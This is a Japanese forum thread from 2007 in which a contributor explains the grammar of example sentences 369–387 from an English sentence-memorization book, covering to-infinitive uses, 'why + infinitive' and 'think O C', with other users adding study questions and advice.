【1】「why+to不定詞」は誤用
why は文全体を修飾する副詞なので、動詞だけにかかることはなく、動詞の他に主語が必要となる。
なので、「why+to不定詞」は誤用とされる(安藤 pp.177-178 は他の理由も挙げている)。
「why+to不定詞」が許容となるのは、
(1)他の「疑問詞+to不定詞」と並列関係にあるとき(how and why to... など)
(2)簡潔さが求められる見出し
 (ttp://www.visitbritain.com/VB3-ja-JP/businesstourism/meetings_and_incentives/why_britain.aspx)
などに限られる(形式が優先される)。

【2】特殊な「why+原型不定詞」
主語が必要なはずの why だが、主語を省略した「why+原型不定詞」という用法がある。
この用法は、主語が「2人称」あるいは「1人称複数(ただし、inclusive we)」の場合のみ、
言い換えると、聞き手を対象として含む場合のみ、に限られる。
この用法は、ニュアンスとして「異議/反語」を表す。
Why wake the baby up?(どうして赤ん坊を起したりなどするの)(『G3』whyの項)
Why argue with him?(彼と議論をしてもむだだ)(江川 p.339)

800 :勝手口 ◆KatteG.R4k :2007/02/12(月) 18:23:28
(つづきです)

【3】「why+原型不定詞」は名詞句として使えるか?
文法書の「why+原型不定詞」に関する説明は、独立文を対象としており、
「疑問詞+to不定詞」のように名詞句として使えるものなのか、という点については触れていない。
この点については、結局よくわからなかった。
使えないとする根拠はなく、『安藤 p.178』や『英語語法大事典 第4巻 p.1030』は「使える」ととれる記述をしているが、
「why+原型不定詞」を名詞句として使っている用例は確認できなかった。
「使える」としても、【2】にあげた用法上の制約とニュアンスの問題から、かなり限定的なものと考えられる。

参考:
『英語語法大事典』第1巻 p.1167、第3巻 p.545、第4巻 p.1030
ttp://www.antimoon.com/forum/2003/3393.htm

ということで、少なくとも学習者にとっては、「疑問詞+to不定詞」と「why+原型不定詞」を同列に扱うのはやめた方がよさそうです。
例文369の説明を以下のように訂正させてください。
【誤】
なお、why だけは、通常は to不定詞ではなく原型不定詞がきます。
【正】
なお、「why+to不定詞」は通常は誤用とされますので、why の場合は完全な間接疑問文 <why s v x> にしましょう。
「why+to不定詞」が使えるのは、(1)他の「疑問詞+to不定詞」と並列、(2)見出し、などに限られます。

801 :勝手口 ◆KatteG.R4k :2007/02/12(月) 18:45:25
>>790
たしかに内容としては不自然な文になりますが、
文法的には「レベルの低い」ものではないと思いますよ。
否定の焦点がどこにあるか、部分否定か全体否定か、という問題ですね。
意味的には、
It is not that everyone believed it.
Not everyone believed it.
となり、部分否定と解釈するのが普通だと思いますので、>>790さんの理解で正しいと思います

内容的には、
「あまりにも馬鹿げた話を大部分の人が信じた」
「全員とは言えないまでも、それなりの人数が信じた」
「彼の話はあまりにもばかげていたので全員が信じるには至らなかった」
となりますね。

802 :名無しさん@英語勉強中:2007/02/12(月) 21:34:00
>>793-794
m9(^Д^)プギャー
>any/every/allの違いを扱った書籍を読んでみた方がいい

803 :勝手口 ◆KatteG.R4k :2007/02/12(月) 23:05:38
370.(to不定詞:疑問詞+to不定詞[wh to do])
S / is / C, // (文型:S V C)
but // S / is / <how to v x>. (文型:S V C)

該当箇所:
「§220 〈疑問詞+to不定詞〉、[1] 〈疑問詞+to不定詞〉の用法、(2) 補語として」

how+to不定詞は、
We / carry / it / ((out)) / M2((in such a way)). (文型:S V O)
ってな形からの変形。
cf. How should we carry it out?


371.(to不定詞:疑問詞+to不定詞[wh to do])
S / did not know / <what answer to v>. (文型:S V O)

該当箇所:
「§220 〈疑問詞+to不定詞〉、[1] 〈疑問詞+to不定詞〉の用法、(3) 目的語として」

what 名詞+to不定詞は、
I / give / such an answer. (文型:S V O)
ってな形からの変形。
cf. What answer should I give?

804 :名無しさん@英語勉強中:2007/02/13(火) 09:17:26
>>795>>801

>>791 was too ridiculous for everyone to believe.

って文意がどこにあると思うの?too ridiculousだろ?
for以下はridiculousの形容の表現に過ぎないんだけど。
too-to構文の語訳にひっぱられて文が何を伝えてるか見誤らないように。
>It is not that everyone believed it.
ってことを言いたいんじゃないんだよ。

A:おまえの話はみんなが信じるにはばかばかし過ぎるよ。
B:じゃあそれなりには信じたやつがいたんだね。

なんでそんな幼稚な挙げ足とりの反論みたいな意味をここから取り出すんだw
しかも百歩譲ってそういう解釈がありだとしてもできるのは多分all(集合として全員)の方だろうし
everyone(全員の1人1人が)ではそこまで拾えないだろうね。

二重否定が杓子定規に肯定にならないのと一緒で何を伝えたい文か考えればすぐ分かる事なのに...

805 :勝手口 ◆KatteG.R4k :2007/02/14(水) 20:28:26
>>804
「文意」を問題にしているのではなく、「部分否定」か「全体否定」か、だけを問題にしています。
His story was too ridiculous for everyone to believe.
という文は、内容的に不自然な文章なので、いくら考えても「何を伝えたい文か」わかりません。

>しかも百歩譲ってそういう解釈がありだとしてもできるのは多分all(集合として全員)の方だろうし
>everyone(全員の1人1人が)ではそこまで拾えないだろうね。
これは「all だと部分否定だけど、everyone だと全体否定」ということでしょうか?
だとすると、>>804さんの勘違いかもしれません。

ついでに、
>って文意がどこにあると思うの?too ridiculousだろ?
>for以下はridiculousの形容の表現に過ぎないんだけど。
どのような文章でも、前後がなければ「文意」はわからないと思います。
もし「修飾部分には『文意』はこない」と考えているのであれば、
『700選』ではなく、もっと長い文章に触れることをお薦めします。

806 :勝手口 ◆KatteG.R4k :2007/02/14(水) 20:42:13
372.(to不定詞:前置詞+関係詞+to不定詞)
S / gave / O1 / O2<a box {←in which to v x}>. (文型:S V O O)

cf. keep / the toys / A((in a box)) (文型:(S) V O A)

to不定詞が名詞を修飾するときに(形容詞的用法)、その名詞が前置詞の目的語の場合、
「前置詞+whom/which+to不定詞」の形で修飾することがあります(文語/格式体)。
「a box to keep the toys in」というように、
関係詞を使わず前置詞を後ろに残す書き方もあります(例文376参照)。その方が普通でしょう。
また、関係詞節で書くこともできます。comment欄を参照してください。
該当箇所:
「§218 to不定詞の形容詞用法、[1] 限定用法、(3) 修飾される語が不定詞句の中の前置詞の目的語になる場合」

なお、この用法があるのは、前置詞の目的語の場合だけであり、
動詞の目的語の場合には、(1)to不定詞、(2)関係詞節、のどちらかになります。
×I need a book which to read.(『PEU』§285-[5])

807 :勝手口 ◆KatteG.R4k :2007/02/14(水) 20:43:34
373.(to不定詞:as if+to不定詞)
S / raised / O / M2((as if to v o)). (文型:S V O)

as if to do / as though to do で、「まるで〜するかのように」を表します。(例文310参照)。
文法的な説明は2種類あるようです。
(1) to不定詞の部分を副詞的用法としてとらえ「as if 副詞要素」の一種と考える(『英文法詳解』p.308)
(2)「as if (S wanted) to do」の「主語+動詞」が省略されたものと考える(安藤 p.375, p.613)
該当箇所:
「§219 to不定詞の副詞用法、[1] 動詞を修飾する用法、(6)-[注]2.〈as if to 〜〉」
「§270 仮定法を含む慣用表現、[1] as if 〜 [as though 〜]、(2)-[注]〈as if to 〜〉」



>>まとめサイトの管理人さん
修正ありがとうございました。

808 :名無しさん@英語勉強中:2007/02/14(水) 23:03:10
修飾部に文意を持ってきたいならso-thatの方を使うだろうね。

809 :勝手口 ◆KatteG.R4k :2007/02/14(水) 23:39:55
>>808
「修飾部に文意を持ってきたいなら、believe の後に it がつく」なら、そうかもしれないな、と思いますが、
so-that文とは関係がないでしょう(元の例文397の訳例は誤訳ですか?)。

何が新情報か、何が次の文で旧情報になっているか、の方がはるかに重要だと思います。

810 :名無しさん@英語勉強中:2007/02/15(木) 00:21:20
高校1年生です。勝手口先生にお聞きしたいことがあります。

私は桐原書店のハーベストと駿台文庫の英語構文詳解を勉強しました。

今は700選で英文和訳と文法のチェックをしているのですが、

勝手口先生が大学受験生だとしたら和文英訳も訓練なさるでしょうか?

つまらない質問かもしれませんがアドバイスしていただきたいのです。

スレ汚し 申し訳ありません。

811 : ◆IuJiIQCtrs :2007/02/15(木) 00:45:43
>>810
俺も高1だけど、例文集や英作文の参考書(文法の参考書もかな?)などは、
理解してから和文英訳して自分で使えるか確認していかないと効果薄いよ。
完全に暗記するのがベストだけど、時間がかかりすぎるし。

812 :名無しさん@英語勉強中:2007/02/15(木) 20:41:32
自称英語のプロのエ ロ が消えるだけでここまで平穏でまともなスレになるんですね。

813 :勝手口 ◆KatteG.R4k :2007/02/15(木) 21:59:16
>>810
とりあえず、先生ってのは勘弁してください。必死に調べてるだけです。
受験英語対策についてはよくわかりませんので、他の方に聞いた方が良いと思いますが、
一般的に、英語を書くための訓練という観点で言うと、
「うろ覚えのまま間違った英語を書いて赤ペンで直す」とかは意味がないので、
見ながらでいいから「正しい英文を正確にたくさん書き写す」というのが良いのではないかと思います。


374.(to不定詞:形容詞的用法−主語)
S / was ((always)) / <the first {←to v}> and <the last {←to v o}>. (文型:S V C)

「名詞+to不定詞」という形は、
(1)名詞が動詞の主語、(2)名詞が動詞の目的語、(3)名詞が前置詞の目的語、(4)to不定詞を後ろにとる特定の名詞、
の場合に限られます。
(4)には、(4-1)派生名詞(例文377、378)、(4-2)関係副詞的関係(例文379)、(4-3)同格(例文380)、
などのパターンがありますが、思ったより少ないので注意しましょう
(たとえば、「〜する方法」の場合、「○ way to do」「× method to do」「○ method of/for doing」)。
なお、(4)については、「名詞の内容を説明するもの」であって「名詞を修飾するもの」ではない、
という解釈で、名詞的用法に区分されることもあります。
該当箇所:
「§218 to不定詞の形容詞用法、[1] 限定用法、(1) 主語関係」

「the first to come and the last to leave [go]」はよく使われるフレーズのようです。
この例文は、the office があって並列構造のバランスが悪い気がしますが、
定型表現をもじったパロディー的表現と考えられます。

814 :勝手口 ◆KatteG.R4k :2007/02/15(木) 22:00:23
375.(to不定詞:形容詞的用法−目的語)
It / is / C / M2((before s v)), // (文型:S V C)(非人称のit:時間)
so // S / will go and get / <a magazine {←to v x}>. (文型:S V O)

cf. read / a magazine / M2((in the train)) (文型:(S) V O)

該当箇所:
「§218 to不定詞の形容詞用法、[1] 限定用法、(2) 目的語関係」

前半の「非人称のit」については、例文156参照。
「go and do」=「go to do」=「go do」については以下を参照。
該当箇所:
「§289 等位接続詞、[1] 連結を示す等位接続詞、(1) and、【6】 不定詞の代用」

815 :名無しさん@英語勉強中:2007/02/15(木) 22:28:19
"go and do" は 647も参照のこと。

816 :名無しさん@英語勉強中:2007/02/15(木) 22:29:18
>>815
647というのは例文647ね。

817 :名無しさん@英語勉強中:2007/02/15(木) 22:32:50
>>810です。
ご回答ありがとうございました。
欲張らずに700選の文法・知識事項のチェックと英文和訳に専念します。
学力不足なので調べなければならないことも多いのですが、
反復学習して克服していきたいと思っています。
スレの住人のみなさん、つまらない質問をして申し訳ありませんでした。

818 :名無しさん@英語勉強中:2007/02/15(木) 22:49:44
>>817
全然、参考にしてないじゃんw

819 :383改め384:2007/02/15(木) 23:22:17
>>810>>817
「700選の英文を暗記したほうがいいか」って質問したんですよね?
反復学習して理解が深まってからのほうが君の場合はよさそうです。
巻末のINDEXも活用して知識と理解を深めてみてはどうでしょうか。
学習が進めば700選の英文暗記も無理なくできるようになります。
がんばってください。

820 :勝手口 ◆KatteG.R4k :2007/02/15(木) 23:32:33
>>815
フォローさんくすです。
そんな先の例文まだ読んでない orz...

>>まとめサイトの管理さん
こんな感じで修正お願いいたします。
【誤】
「go and do」=「go to do」=「go do」については以下を参照。
【正】
「go and do」=「go to do」=「go do」については以下を参照(例文647も参照)。

821 :383改め384:2007/02/16(金) 06:56:59
>>810>>817
自分が英文暗記で悩んだのは意外かもしれませんが名詞でした。
それは「単数形か複数形か」「冠詞が付くか付かないか」についてです。
いつか役に立つかもしれませんのでパターンを整理しておきます。

@ the+単数形 A the+複数形 B a+単数形 C 無冠詞+単数形 D 無冠詞+複数形

注意1 特定される場合は@かAのパターンになり、不特定の場合はB〜Dのそれになります。
注意2 加算名詞は@ABDのパターンになり、不加算名詞は@かCのそれになります。

822 :名無しさん@英語勉強中:2007/02/16(金) 15:11:45
出口さんの品詞分解ぐらいは自分で調べないでサイトの情報を700選に書いてしまってもいいのかなぁ…。
品詞分解は俺にとっては謎過ぎるんだよな。誰かまんまあの情報使って成功した人いませんか?
なんか各所には自分で調べないとまったく使い物にならないって書いてあるから不安だ

823 :名無しさん@英語勉強中:2007/02/16(金) 15:15:28
こうゆう英文が羅列してある参考書はとにかく全文暗唱出来るまで覚えることが先決。
文法は大事だがまず700文を暗記してください。文法解釈は暗記してからのほうが効率よくスムーズに頭に入ります。
とりあえず英文の細かな構造は理解出来なくてもいいので暗記してください。

824 :名無しさん@英語勉強中:2007/02/16(金) 15:19:49
>>822
その前に日本語がやばいぞ

825 :名無しさん@英語勉強中:2007/02/16(金) 18:36:48
そんなにやばくないと思うんだが

826 :名無しさん@英語勉強中:2007/02/16(金) 20:40:53
FOR使って自分で品詞分解→出口サイトで答え合わせ

827 :名無しさん@英語勉強中:2007/02/16(金) 22:19:52
解説してるサイト見っけた。 前出たのじゃないやつ
ttp://www.rivo.mediatti.net/~arm/home/ho_ref.html

828 :名無しさん@英語勉強中:2007/02/16(金) 23:44:25
>>823
これは酷いな。
いずれにしてもただ英文覚えるのは無理だから文法事項しらべてから覚えな

829 :勝手口 ◆KatteG.R4k :2007/02/16(金) 23:59:01
376.(to不定詞:形容詞的用法−前置詞の目的語)
S / has / <{no→} house {←to v x}> and <{no→} wife and children {←to v x}>. (文型:S V O)

cf. live / A((in a house)) (文型:(S) V A)
cf. provide / A((for a wife and children)) (文型:(S) V A)

前置詞の目的語の場合、「名詞+to+動詞...前置詞」というように前置詞が後ろに残ります(例文372参照)。
ただし、前置詞が要りそうなのに付いてないこともあります(例文379の説明参照)。
とりあえずは「誤解が生じない場合は省略されることもある」と考えておくのが良いと思います。
(『Forest 第4版』 p.159)
該当箇所:
「§218 to不定詞の形容詞用法、[1] 限定用法、(3) 修飾される語が不定詞句の中の前置詞の目的語になる場合」

「名詞 to live in」が出たついでに取り上げておきますが、
修飾される名詞が place の場合、前置詞を省略できます(『PEU』§431。江川 p.437)。
これは「(4-2)関係副詞的関係」と考えられます(例文379参照)。
I'm looking for a place to live.(格式体では、I'm looking for a place to live in.)
It is not a very agreeable place to live, this world of ours.
(兎角に人の世は住みにくい。夏目漱石『草枕』アラン・ターニー訳)
該当箇所:
「§218 to不定詞の形容詞用法、[1]-(3)-[参考]place to live」

この点に関し、『英文法講義の実況中継』「不定詞の講義(3)」は、
「a place to sleep」は誤用で「a place to sleep in」が正しい、としていますが、
「a place to sleep」も誤用ではありません。

830 :名無しさん@英語勉強中:2007/02/17(土) 00:01:44
今日もキタ―――

831 :勝手口 ◆KatteG.R4k :2007/02/17(土) 00:21:24
ちなみに、例文379で載せる予定の説明はこんな感じです。

【ポイント】前置詞が要りそうなのに前置詞をつけないケース
(1)関係副詞の先行詞になる名詞
 place、time、way、reason(同類として、somewhere/anywhere/nowhere)
(2)「副詞的用法」または「to不定詞の意味上の主語」と考えられるような場合
 Have you got a key to open this door?(『PEU』§285-[3])
 I want a knife to cut this meat.(江川 p.437)
 He had no money to buy the book.(江川 p.437)
該当箇所:
「§218 to不定詞の形容詞用法、Q&A 76 I have no money to buy a car. に with は不要か?」

(2)については、以下のような説明もあり、「関係副詞的関係」の一種と考えることもできます。
・「手段」のwith、「場所」のin/onは、省略される場合がある(安藤 p.209)
・money など how(手段)に対応するものは前置詞がつかない(『現代英語語法辞典』p.1201)
また、以下のような説明もあります。
・文意に誤解が生じない場合は、省略されることもある(『Forest 第4版』 p.159)。
・不定詞に長い目的語などがついて語数が多ければ、前置詞は省略される(『英文法詳解』p.379)

832 :名無しさん@英語勉強中:2007/02/17(土) 01:39:15
>>704の方法で圧縮してみました。
SoundEngine は使い易いソフトですね。波形のパターンが把握できれば、
一々音を聞かなくても番号部分を削除できるので楽です。
70分弱まで短縮できました。感謝。

833 :名無しさん@英語勉強中:2007/02/17(土) 05:39:00
>>827
1ページだけじゃんw

834 :名無しさん@英語勉強中:2007/02/17(土) 05:39:13
俺のPCは松下のドライブだから
CD2WAV32が使えないんだけど。
他に何かありますか?

835 :名無しさん@英語勉強中:2007/02/17(土) 05:44:32
>>828
私は『700選』の英文を130まで覚えてしまうまでは文法もロクに分かっていなかった。
それまでほぼ全くの丸暗記である。
ただ、130あたりまで完全に覚えると、英文の骨格が見えるようになってくる。
例文が頭に染み付いた後で文法書を読むと内容がどんどん頭に入ってくるのである。

ttp://www.geocities.jp/sleepingsteeples/ri3.htm

836 :名無しさん@英語勉強中:2007/02/17(土) 08:07:50
700選が学力的にスムーズに使いこなせるか心配です。今の学力:センター文法で3、4問くらい確信がもてずに回答、偏差値は河合全統60後半ぐらい。

837 :名無しさん@英語勉強中:2007/02/17(土) 08:20:42
↑60台後半

838 : ◆IuJiIQCtrs :2007/02/17(土) 08:22:57
>>836
ここに受験に詳しい人はいないよ。
河合で偏差値70いかないなら、基礎に問題があると考えるのが妥当。
問題が簡単すぎるから、有名進学校では受験すらしないよ。

839 :名無しさん@英語勉強中:2007/02/17(土) 11:50:17
センター文法は語法・熟語問題が多いからなんとも。
とりあえず700選を35Pまで立ち読みしてみて、
訳を読めば構造はわかるかなーくらいだったら大丈夫では。
つーか、ある程度の文法知識と熟語知識が入ってないと
読んでても面白くない気がする。

840 :名無しさん@英語勉強中:2007/02/17(土) 13:44:23
<ここは解説をするスレ>だからね。

文の構造を把握できて大まかな文法事項を全部理解してれば十分。

頭の悪い奴がどうしても英語をできるようにしたい!って人が必死にやるか
英語完璧で全国1番になりたい!って人が使う教材。

841 :勝手口 ◆KatteG.R4k :2007/02/17(土) 22:31:17
377.(to不定詞:名詞+to不定詞−派生名詞)
S / was / spoiled / M2((by O)). (文型:S V C)(受動態)

cf. Our father / failed / to return M2((at O)). (文型:S V to do)
文→名詞句のポイント:主語→所有格、動詞+to不定詞→名詞+to不定詞
(例文241参照。fail to do については、例文24、317参照)

「動詞/形容詞+to不定詞」の形をとる動詞/形容詞から派生した名詞の場合、
そのまま「派生名詞+to不定詞」の形をとることができます(派生名詞については「A-9 名詞構文」を復習)。
このタイプは「同格」として扱われることもあります。
該当箇所:
「§217 to不定詞の名詞用法、[3] 名詞と同格の用法」
「付録1 類例リスト、35. to不定詞を同格にとるおもな名詞」


378.(to不定詞:名詞+to不定詞−派生名詞)
S / announced / O. (文型:S V O)

cf. They / were / ready / to v x. (文型:S V C to do)
文→名詞句のポイント:主語→所有格、be動詞→省略、形容詞補語+to不定詞→名詞+to不定詞
(例文248参照)
to不定詞のところは、participate / A((in O)) (文型:(S) V A)

842 :名無しさん@英語勉強中:2007/02/18(日) 00:00:56
>>840
> <ここは解説をするスレ>だからね。
意味不明。

> 文の構造を把握できて大まかな文法事項を全部理解してれば十分。
何が十分?

> 頭の悪い奴がどうしても英語をできるようにしたい!って人が必死にやるか
> 英語完璧で全国1番になりたい!って人が使う教材。
頭悪そう。

843 :名無しさん@英語勉強中:2007/02/18(日) 05:16:32
ヤレヤレ解説もしないご身分なのに罵り合って...

このまま来年も無事に落ちるといいね。

844 :名無しさん@英語勉強中:2007/02/18(日) 07:12:07
こっちでやれ。

英語の例文暗記について [2]
http://ex21.2ch.net/test/read.cgi/kouri/1170945220/l50

845 :勝手口 ◆KatteG.R4k :2007/02/18(日) 21:58:48
379.(to不定詞:名詞+to不定詞−関係副詞的関係)
S / ((often)) complain / <that s v x>, // (文型:S V O)
but // S / are / C. (文型:S V C)

that節内は、S / have / <{little→} time {←to v}> (文型:S V O)

内容的に関係副詞節(先行詞+when/where/how/why節)に相当する「名詞+to不定詞」の形があります。
修飾される名詞は、time、place、way、reason です。
前置詞が要りそうですが通常はつけません(例文376の place に関する説明も参照)。
関係副詞も省略されたり thatで代用されたりすることがあるので、同様の発想だと考えられます。
該当箇所:
「§218 to不定詞の形容詞用法、[1] 限定用法、(4) その他の修飾関係―関係副詞が導く形容詞節に相当する」
参考:
「§313 関係副詞の省略」

【ポイント】前置詞が要りそうなのに前置詞をつけないケース
(1)関係副詞の先行詞になる名詞
 place、time、way、reason(同類として、somewhere/anywhere/nowhere)
(2)「副詞的用法」または「to不定詞の意味上の主語」と考えられるような場合
 Have you got a key to open this door?(『PEU』§285-[3])
 I want a knife to cut this meat.(江川 p.437)
 He had no money to buy the book.(江川 p.437)
該当箇所:
「§218 to不定詞の形容詞用法、Q&A 76 I have no money to buy a car. に with は不要か?」

(2)については、以下のような説明もあり、「関係副詞的関係」の一種と考えることもできます。
・義務的副詞句でない場合、「手段」のwith、「場所」のin/on は省略できる(安藤 p.209)
・money など how(手段)に対応するものは前置詞をつけなくてもいい(『現代英語語法辞典』p.1201)
また、以下のような説明もあります。
・文意に誤解が生じない場合は、省略されることもある(『Forest 第4版』 p.159)
・不定詞に長い目的語などがついて語数が多ければ、前置詞は省略される(『英文法詳解』p.379)

846 :勝手口 ◆KatteG.R4k :2007/02/18(日) 22:00:00
380.(to不定詞:名詞+to不定詞−同格)
S / is / <a {good→} chance {←for s' to v x}>. (文型:S V C)

to不定詞のところは、learn / <a {great→} deal {←about O}> (文型:(S) V O)

to不定詞が名詞の内容を説明しているタイプです。
名詞によって to不定詞をとれるかどうか決まってますので、辞書で語法を確認しましょう。
該当箇所:
「§218 to不定詞の形容詞用法、[1] 限定用法、(4)-[注]限定修飾と同格」
「§217 to不定詞の名詞用法、[3] 名詞と同格の用法」
「付録1 類例リスト、35. to不定詞を同格にとるおもな名詞」

847 :名無しさん@英語勉強中:2007/02/18(日) 22:47:12
日曜日もご苦労様です。
質問があります。

>>845
>>【ポイント】前置詞が要りそうなのに前置詞をつけないケース

「前置詞をつけなくてもよいケース」ではないのですか?
 Have you got a key to open this door with?
としては「いけない」んでしょうか。

>>846
>>S / is / <a {good→} chance {←for s' to v x}>. (文型:S V C)

この2行目のアポストロフィは v の意味上の主語という意味でしょうか。

848 :勝手口 ◆KatteG.R4k :2007/02/19(月) 00:00:33
>>847
>「前置詞をつけなくてもよいケース」ではないのですか?
その通りなんですが、どう表現するのがいいのか難しいところです。
「前置詞をつけてはいけない」というわけではないんですが、実際にはほとんどつきません。
また、「文法的には前置詞が必要だが、それが省略されてる」と言い切れるわけでもありません
(たとえば、「to不定詞の意味上の主語」であれば、前置詞はもともといらない)。

「前置詞をつけないことが多いケース」というのはどうでしょう?
管理人さんに任せることにします。

>この2行目のアポストロフィは v の意味上の主語という意味でしょうか。
はい、そういうことです。
主格じゃないので「s」ではまずいな、でも「for O」じゃ意味上の主語ってわからんし、
ということで、「s'」としてみました。
もっと良い表記法があったら教えてください。

849 :勝手口 ◆KatteG.R4k :2007/02/19(月) 22:15:42
381.(to不定詞:副詞的用法−目的)
S / will come / A((here)) / M2((soon)) / M2((to v o)). (文型:S V A)
【別訳】「彼は、まもなく当地へやって来て、この町の産業を視察します」

おなじみの「目的」を表す用法です。副詞的用法としては最も一般的なものです。
「〜するために/〜するよう」というように、後ろから訳すのが基本だと思いますが、
文脈によっては【別訳】のように前から訳すこともできます。
目的を表す用法だと明確に示す場合には、「in order to」や「so as to」を使います。
なお、否定の目的(〜しないように)を表す場合、
通常は、単独の「not to」ではなく「so as not to」「in order not to」を使います。
該当箇所:
「§219 to不定詞の副詞用法、[1] 動詞を修飾する用法、(1) 目的を表す」
「§216 不定詞の否定形と分離不定詞、[1] 不定詞の否定形、(2) 「〜しないように」という否定の目的を表す場合」


382.(to不定詞:副詞的用法−目的)
S / stood / A((aside)) / M2((for s' to v)). (文型:S V A)

副詞的用法でも、to不定詞の意味上の主語は「for 目的格」で表します。
「in order for 目的格 to do」の形は可能ですが、「so as for 目的格 to do」はまれだそうです。
該当箇所:
「§226 不定詞の意味上の主語の表し方、(2) 意味上の主語を〈for+目的格〉で表す場合、【3】 副詞用法の場合」

stand は、動作と状態の両方に使うことができます。
また、動作を表す場合、組み合わせる副詞要素によって、
座った状態から立ち上がる動作になったり、立ったまま移動する動作になったりします。
辞書で確認しておきましょう。
(『ヴォイスとアスペクト』pp.75-89 参照)

850 :勝手口 ◆KatteG.R4k :2007/02/20(火) 21:58:30
383.(to不定詞:副詞的用法−結果)
S / woke / M2((this morning)) / M2((to v x)). (文型:S V)

to不定詞のところは、find / O / {covered ((with O))} (文型:(S) V O C)
cf. The summit {←of the mountain} / was / covered / A((with snow)). (文型:S V C A)(受動態)

to不定詞の内容が意図的なものだとみなせない場合、「結果」を表します。
この場合は後ろから訳すことはできません(たぶん)。
該当箇所:
「§219 to不定詞の副詞用法、[1] 動詞を修飾する用法、(2) 結果を表す」


384.(to不定詞:副詞的用法−結果)
S / inquired / M2((at O)) / M2((only to v x)). (文型:S V)

to不定詞のところは、find / <(that) s v x> (文型:(S) V O)
that節内は、there / was / <{no→} <student {←by the name of O}> > (文型:There V S)

「only to」や「never to」は、通常「結果」を表します
(ただし、「only to」が「目的」を表すケースもあります。下記該当箇所の[注]を参照)。
「only to」は、驚きや失望といった気持ちを表す場合によく使われます(『PEU』§292-[1])。
該当箇所:
「§219 to不定詞の副詞用法、[1] 動詞を修飾する用法、(2) 結果を表す」

851 :名無しさん@英語勉強中:2007/02/21(水) 15:57:16
お疲れ様です

852 :勝手口 ◆KatteG.R4k :2007/02/21(水) 22:32:29
>>851
ありがとうございます。
じっくりと文法を調べるの結構楽しいです。見てる人にも役に立ってると嬉しいですね。


385.(to不定詞:副詞的用法−条件)
M2((To v x)), / S / would think / O / to v c. (文型:S V O to do)

最初の to不定詞のところは、hear / O / play the violin (文型:S V O C)
cf. He / plays / the violin. (文型:S V O)

to不定詞が仮定法の条件部分を表すものです(例文305参照)。
「To see/hear..., you'd think...」といった形でよく使われます(『PEU』§292-[2])。
該当箇所:
「§219 to不定詞の副詞用法、[1] 動詞を修飾する用法、(5) 条件を表す」
「§264 if節の代用、(1) 不定詞」

853 :勝手口 ◆KatteG.R4k :2007/02/21(水) 22:33:23
386.(to不定詞:副詞的用法−原因/理由/根拠)
C<What a good scholar> / S / must be / M2((to v o)). (文型:S V C)(感嘆文)

感嘆文なので補語部分が文頭にでています。
該当箇所:
「§33 感嘆文、[1] 感嘆文の形式、(2) 〈What a [an]+形容詞+名詞+S+V … !〉」

to不定詞には、「〜するなんて/〜するとは」という「判断の根拠」を表す用法があります。
「(感情の)原因」「理由」「判断の根拠」を表す to不定詞に関しては、
文法書によって名称と区分がバラバラな感じですが、
いずれも、to不定詞だけど「主文より昔の事柄」を表す、という点が特徴的です(安藤 p.212 参照)。
(感情の原因を表す用法については、例文61、273、291参照)
該当箇所:
「§219 to不定詞の副詞用法、[1] 動詞を修飾する用法、(3) 原因・理由を表す/(4) 判断の根拠を表す」

なお、分詞構文でも「判断の根拠」に相当する表現が表せます。
一見わかりづらく誤読しやすいので注意しましょう。
You must think I'm mad talking to you like this.(『英文法詳解』p.381)

854 :383改め384:2007/02/21(水) 23:28:02
いつも解説ありがとうございます。
700選と同様にロイヤル英文法にも愛着を感じてきました。
いつか『現代英文法講義』も手に入れたいなぁ。

855 :名無しさん@英語勉強中:2007/02/22(木) 00:26:32
お疲れ様です。

>>852
>>見てる人にも役に立ってると嬉しいですね。

とても勉強になってますよ!ありがとうございます。

ところで例文385ですが、

>>M2((To v x)), / S / would think / O / to v c. (文型:S V O to do)

これは、いわゆる五文型にはあてはまらないということでしょうか?

薬袋式の分類だと「to be は前の働きが補語」で、
第五文型(S V O C)になります(英語リーディング教本 P231)。


あと以前から気になってるのが

I think him a genius.
I think him to be a genius.
I think of him as a genius.

これらってどう違うんでしょう?
ご存知の方ご教示を。

856 :名無しさん@英語勉強中:2007/02/22(木) 16:22:33
彼のことを天才だと思う。
彼は天才だと思う。
彼を天才と思う。

これらってどう違うんでしょう(日本語として)?

857 :勝手口 ◆KatteG.R4k :2007/02/22(木) 22:11:56
>>855
>ところで例文385ですが、
>>>M2((To v x)), / S / would think / O / to v c. (文型:S V O to do)
>これは、いわゆる五文型にはあてはまらないということでしょうか?
五文型にあてはめれば「S V O C」です。その方がわかりやすかったら、そう読み替えてください。
文型区分はおまけというか気分の問題です。
(「S V O 原形不定詞」も、適切な表記があれば「S V O C」とは書かないんですが、良い表記がないですね)

過去にも触れましたが、『江口 p.331』は、
「『S+V+O+不定詞』の構文を8品詞5文型の学習文法の枠内で処理することは不可能」と言っています。
「『S V O C』と呼ぶのは簡単だが、そう呼んだところでたいして役に立たない」ということだと思います。
個人的には、「S V to do」や「S V O to do」は、「何文型か?」にこだわるよりも、
意味と用法を考えた方が良いだろう、と思っています(各文法書の区分でもそんな感じです)。

それから、think に関する用法について調べてみました。以下のような感じかと思います。
(まとめサイトの管理人さん、以下の文を例文385の説明に加えておいていただけますか)

【ポイント】「think O C」に関連する区別(ただし、微妙な区別であり書き換え可能なことも多い)
(a) I think (that) he is a genius.
(b) I think him a genius.
(c) I think him to be a genius. (c') He is thought to be a genius.
(d) I think of him as a genius.

(a):最も自然な表現。ただし、直接的な経験に基づくとは限らず、間接的な伝聞に基づく判断の場合がある。
(b):直接的経験に基づく。受動態なら to be がつくのが普通(つまり(c')になる)。
(c):直接的経験に基づく。能動態としては格式体(普通は(a)か(b))。
(d):ややインフォーマル。ある側面を特定的に取り上げて言及する。
 I think of him as a friend (rather than a teacher). 私は彼のことを(先生というより)友だちと思っている。
 (『新英和中辞典 第6版』thinkの項)
((a)(b)(c)の区分については、『PEU』§418-[2]。『英語の感覚・日本語の感覚』pp.71-77)
参考:
「§223 〈S+V+O+to不定詞〉、[2] 〈S+V+O+to be〉、(1) to be を省略できるもの」

858 :勝手口 ◆KatteG.R4k :2007/02/22(木) 22:12:58
387.(to不定詞:副詞的用法−独立用法)
M2((To tell the truth)), / it / does not ((always)) pay / S<to v o>. (文型:S V)(形式主語のit:真主語がto不定詞)

最初の to不定詞は、文修飾の副詞的用法で、後ろの to不定詞は、真主語になる名詞的用法です。

to不定詞が文全体を修飾する場合があり(文副詞)、「独立不定詞」とか「独立用法」とか呼ばれます。
だいたい形が決まってるんで、慣用句として憶えておきましょう。
場所は、文頭・中位・文末いずれも可能で、カンマがつきます。
該当箇所:
「§224 独立不定詞」
「§387 挿入語句、(4) 独立不定詞・分詞構文」


